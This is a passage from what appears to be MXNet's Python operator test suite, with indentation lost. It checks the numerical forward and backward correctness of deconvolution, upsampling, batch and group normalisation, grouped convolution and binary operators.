y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe = y.simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
exe.forward(is_train=False)
o = exe.outputs[0]
t = o.asnumpy()
check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
@with_seed()
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
@with_seed()
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
# bilinear upsampling takes only 1 data and 1 weight
# multi input mode is not applicable
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
@with_seed()
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
s = shape[1],
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@with_seed()
def test_batchnorm():
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(op, shape, axis, cudnn_off, output_mean_var):
print(str((op, shape, axis, cudnn_off)))
kwargs = dict(output_mean_var=output_mean_var)
if op == mx.nd.contrib.SyncBatchNorm:
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad()
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad()
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
for _ in range(num_iters):
data = mx.nd.random.uniform(shape=shape)
data.attach_grad()
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=False, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
running_var = running_var * momentum + \
data_var_flat * (1 - momentum)
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
m = np.prod(shape) / shape[axis]
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
atol = 1e-2
rtol = 1e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(data.grad.asnumpy(),
dX.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_gamma.grad.asnumpy(), dW.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_beta.grad.asnumpy(), db.asnumpy(), atol=atol, rtol=rtol)
for op in [mx.nd.BatchNorm, mx.nd.contrib.SyncBatchNorm]:
for shape in [(24, 2), (24, 3, 4), (24, 4, 4, 4), (24, 8, 4, 4), (24, 5, 6, 4, 4)]:
for axis in range(len(shape)):
for cudnn_off in [False, True]:
for output_mean_var in [False, True]:
_test_batchnorm_impl(op, shape, axis,
cudnn_off, output_mean_var)
@with_seed()
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
def np_groupnorm(data, gamma, beta, num_groups, eps):
new_param_shape = (1, num_groups, 1, 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
return out.reshape(dshape), mean, std
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, num_groups, 1, 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
beta_grad = np.sum(ograd, axis=(0, 2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype)
gamma_grad = np.sum(x_hat * ograd, axis=(0, 2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype)
x_hat_grad = ograd * gamma
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_groups,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-5, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-5, dtype=dtype)
@with_seed()
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1.simple_bind(default_context(), x=shape)
exe2 = y2.simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@unittest.skip("Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
@with_seed()
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1.simple_bind(dev, x=shape)
exe2 = y2.simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@with_seed()
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv.bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv.bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
d = gen_broadcast_data(idx);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
d = gen_binary_data(dummy);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
logging.error('input a hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
y.forward(is_train=True)
y.backward([mx.nd.array(out)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
@with_seed()
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
